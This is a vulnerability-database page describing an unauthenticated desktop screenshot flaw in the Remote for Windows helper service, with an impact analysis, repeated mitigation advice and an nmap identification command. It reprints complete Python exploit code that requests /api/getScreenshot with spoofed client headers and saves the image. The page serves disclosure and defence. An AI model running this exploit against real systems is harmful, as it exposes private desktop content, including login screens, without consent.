Windows 2024.15 - Unauthenticated Desktop Screenshot Capture
Windows 2024.15 - Unauthenticated Desktop Screenshot Capture
AI Analysis
Technical Summary
The Windows 2024.15 Unauthenticated Desktop Screenshot Capture exploit targets a vulnerability in the Remote for Windows helper service, specifically the /api/getScreenshot API endpoint. This endpoint lacks proper authentication checks, allowing unauthenticated remote attackers to capture screenshots of the desktop environment, including login screens, with SYSTEM-level privileges. The vulnerability is exploitable when the "Allow unknown devices" setting is enabled, which is disabled by default but may be enabled in some configurations. The exploit leverages the absence of authentication on the API endpoint to send a crafted HTTPS GET request to the target service, which responds with a JPEG image of the current desktop session. The exploit code is implemented in Python 3 and uses the requests library to send the request and save the screenshot locally if successful. Identification of vulnerable systems can be aided by scanning for SSL certificates with the subject "CN=SecureHTTPServer/O=Evgeny Cherpak/C=US," which is associated with the Remote for Windows helper service. The vulnerability affects Windows 10 and 11 systems running the Remote for Windows helper version 2024.15. No official patches or vendor advisories are currently available, and there are no known exploits in the wild at the time of publication. However, the presence of publicly available exploit code increases the risk of exploitation. This vulnerability compromises confidentiality by exposing potentially sensitive desktop content without any authentication, while also impacting integrity and availability indirectly by enabling reconnaissance and potential follow-up attacks. The exploit requires no user interaction or authentication, making it highly accessible to remote attackers who can reach the vulnerable service over the network.
Potential Impact
For European organizations, this vulnerability poses a significant risk to confidentiality, as attackers can remotely capture screenshots of desktops, including sensitive information displayed on login screens or active sessions. This could lead to exposure of credentials, confidential documents, or other sensitive data. Organizations in sectors such as finance, healthcare, government, and critical infrastructure are particularly at risk due to the potential leakage of sensitive operational or personal data. The SYSTEM-level access context of the screenshots indicates that the service runs with high privileges, increasing the severity of the information exposure. Additionally, the ability to capture login screens may facilitate further attacks such as credential harvesting or session hijacking. The exploit's reliance on the "Allow unknown devices" setting being enabled means that organizations with lax security configurations or those that enable this setting for operational reasons are more vulnerable. The lack of authentication on the API endpoint also suggests a design flaw that could be exploited in other ways. The availability of a working exploit in Python lowers the barrier for attackers, potentially increasing the likelihood of targeted attacks against European enterprises. The impact extends beyond confidentiality to potential reputational damage, regulatory non-compliance (e.g., GDPR violations due to data exposure), and increased risk of subsequent intrusions.
Mitigation Recommendations
1. Immediately audit and disable the "Allow unknown devices" setting in the Remote for Windows helper service if it is enabled, as this setting directly enables the exploit. 2. Restrict network access to the Remote for Windows helper service, ideally limiting it to trusted management networks or VPNs, to prevent unauthorized external access. 3. Implement network-level controls such as firewall rules or intrusion prevention systems to detect and block requests to the /api/getScreenshot endpoint, especially those lacking proper authentication headers. 4. Monitor network traffic for anomalous HTTPS requests targeting the vulnerable API endpoint, particularly those with suspicious client tokens or host headers as seen in the exploit code. 5. Conduct a comprehensive inventory of Windows 10 and 11 systems running the Remote for Windows helper version 2024.15 and prioritize patching or upgrading once vendor fixes become available. 6. Employ endpoint detection and response (EDR) tools to detect unusual API calls or unauthorized screenshot capture activities. 7. Educate IT and security teams about this vulnerability and the risks of enabling permissive device connection settings. 8. If possible, disable or uninstall the Remote for Windows helper service on systems where it is not strictly required. 9. Engage with the vendor to obtain patches or mitigations and apply them promptly upon release. 10. Implement multi-factor authentication and other compensating controls to mitigate risks from potential credential exposure.
Affected Countries
Germany, France, United Kingdom, Netherlands, Italy, Spain, Poland, Belgium, Sweden, Finland
Indicators of Compromise
- exploit-code: # Exploit Title: Windows 2024.15 - Unauthenticated Desktop Screenshot Capture # Date: 2025-05-19 # Exploit Author: Chokri Hammedi # Vendor Homepage: https://rs.ltd # Software Link: https://rs.ltd/latest.php?os=win # Version: 2024.15 # Tested on: Windows 10/11 with Remote for Windows (helper) ''' Description: - Exploits the getScreenshot API endpoint in Remote for Windows helper service - Works when "Allow unknown devices" setting is enabled (default: disabled) - Captures current desktop including login screens (SYSTEM-level access) Vulnerable Component: - /api/getScreenshot endpoint with missing authentication checks # Identification: nmap -p- -T4 <TARGET_IP> --script ssl-cert Look for SSL cert with subject: CN=SecureHTTPServer/O=Evgeny Cherpak/C=US ''' #!/usr/bin/env python3 import requests import sys from urllib3.exceptions import InsecureRequestWarning requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning) def capture_screenshot(ip, port, output_file): try: response = requests.get( f"https://{ip}:{port}/api/getScreenshot", headers={ "X-ClientToken": "exploit", "X-HostName": "attacker-pc", "X-HostFullModel": "exploit-device" }, verify=False, timeout=15 ) if response.status_code == 200 and response.content.startswith(b'\xff\xd8'): with open(output_file, 'wb') as f: f.write(response.content) print(f"[+] Saved: {output_file}") return True print(f"[-] Failed: HTTP {response.status_code}") return False except Exception as e: print(f"[-] Error: {str(e)}") return False if __name__ == "__main__": if len(sys.argv) < 4: print(f"Usage: {sys.argv[0]} <IP> <PORT> <output.jpg>") sys.exit(1) sys.exit(0 if capture_screenshot(sys.argv[1], sys.argv[2], sys.argv[3]) else 1)
Windows 2024.15 - Unauthenticated Desktop Screenshot Capture
Description
Windows 2024.15 - Unauthenticated Desktop Screenshot Capture
AI-Powered Analysis
Technical Analysis
The Windows 2024.15 Unauthenticated Desktop Screenshot Capture exploit targets a vulnerability in the Remote for Windows helper service, specifically the /api/getScreenshot API endpoint. This endpoint lacks proper authentication checks, allowing unauthenticated remote attackers to capture screenshots of the desktop environment, including login screens, with SYSTEM-level privileges. The vulnerability is exploitable when the "Allow unknown devices" setting is enabled, which is disabled by default but may be enabled in some configurations. The exploit leverages the absence of authentication on the API endpoint to send a crafted HTTPS GET request to the target service, which responds with a JPEG image of the current desktop session. The exploit code is implemented in Python 3 and uses the requests library to send the request and save the screenshot locally if successful. Identification of vulnerable systems can be aided by scanning for SSL certificates with the subject "CN=SecureHTTPServer/O=Evgeny Cherpak/C=US," which is associated with the Remote for Windows helper service. The vulnerability affects Windows 10 and 11 systems running the Remote for Windows helper version 2024.15. No official patches or vendor advisories are currently available, and there are no known exploits in the wild at the time of publication. However, the presence of publicly available exploit code increases the risk of exploitation. This vulnerability compromises confidentiality by exposing potentially sensitive desktop content without any authentication, while also impacting integrity and availability indirectly by enabling reconnaissance and potential follow-up attacks. The exploit requires no user interaction or authentication, making it highly accessible to remote attackers who can reach the vulnerable service over the network.
Potential Impact
For European organizations, this vulnerability poses a significant risk to confidentiality, as attackers can remotely capture screenshots of desktops, including sensitive information displayed on login screens or active sessions. This could lead to exposure of credentials, confidential documents, or other sensitive data. Organizations in sectors such as finance, healthcare, government, and critical infrastructure are particularly at risk due to the potential leakage of sensitive operational or personal data. The SYSTEM-level access context of the screenshots indicates that the service runs with high privileges, increasing the severity of the information exposure. Additionally, the ability to capture login screens may facilitate further attacks such as credential harvesting or session hijacking. The exploit's reliance on the "Allow unknown devices" setting being enabled means that organizations with lax security configurations or those that enable this setting for operational reasons are more vulnerable. The lack of authentication on the API endpoint also suggests a design flaw that could be exploited in other ways. The availability of a working exploit in Python lowers the barrier for attackers, potentially increasing the likelihood of targeted attacks against European enterprises. The impact extends beyond confidentiality to potential reputational damage, regulatory non-compliance (e.g., GDPR violations due to data exposure), and increased risk of subsequent intrusions.
Mitigation Recommendations
1. Immediately audit and disable the "Allow unknown devices" setting in the Remote for Windows helper service if it is enabled, as this setting directly enables the exploit. 2. Restrict network access to the Remote for Windows helper service, ideally limiting it to trusted management networks or VPNs, to prevent unauthorized external access. 3. Implement network-level controls such as firewall rules or intrusion prevention systems to detect and block requests to the /api/getScreenshot endpoint, especially those lacking proper authentication headers. 4. Monitor network traffic for anomalous HTTPS requests targeting the vulnerable API endpoint, particularly those with suspicious client tokens or host headers as seen in the exploit code. 5. Conduct a comprehensive inventory of Windows 10 and 11 systems running the Remote for Windows helper version 2024.15 and prioritize patching or upgrading once vendor fixes become available. 6. Employ endpoint detection and response (EDR) tools to detect unusual API calls or unauthorized screenshot capture activities. 7. Educate IT and security teams about this vulnerability and the risks of enabling permissive device connection settings. 8. If possible, disable or uninstall the Remote for Windows helper service on systems where it is not strictly required. 9. Engage with the vendor to obtain patches or mitigations and apply them promptly upon release. 10. Implement multi-factor authentication and other compensating controls to mitigate risks from potential credential exposure.
For access to advanced analysis and higher rate limits, contact root@offseq.com
Technical Details
- Edb Id
- 52300
- Has Exploit Code
- true
- Code Language
- python
Indicators of Compromise
Exploit Source Code
Exploit code for Windows 2024.15 - Unauthenticated Desktop Screenshot Capture
# Exploit Title: Windows 2024.15 - Unauthenticated Desktop Screenshot Capture # Date: 2025-05-19 # Exploit Author: Chokri Hammedi # Vendor Homepage: https://rs.ltd # Software Link: https://rs.ltd/latest.php?os=win # Version: 2024.15 # Tested on: Windows 10/11 with Remote for Windows (helper) ''' Description: - Exploits the getScreenshot API endpoint in Remote for Windows helper service - Works when "Allow unknown devices" setting is enabled (default: disabled) - Captures current desktop includ... (1463 more characters)
Threat ID: 68489dc07e6d765d51d531e9
Added to database: 6/10/2025, 9:04:00 PM
Last enriched: 6/11/2025, 9:14:24 PM
Last updated: 8/15/2025, 1:02:17 PM
Views: 19
Related Threats
U.S. CISA adds N-able N-Central flaws to its Known Exploited Vulnerabilities catalog - Security Affairs
MediumU.S. CISA adds Microsoft Internet Explorer, Microsoft Office Excel, and WinRAR flaws to its Known Exploited Vulnerabilities catalog
MediumSilent Watcher: Dissecting Cmimai Stealer's VBS Payload
MediumCisco ISE 3.0 - Remote Code Execution (RCE)
CriticalCisco ISE 3.0 - Authorization Bypass
MediumActions
Updates to AI analysis are available only with a Pro account. Contact root@offseq.com for access.
External Links
Need enhanced features?
Contact root@offseq.com for Pro access with improved analysis and higher rate limits.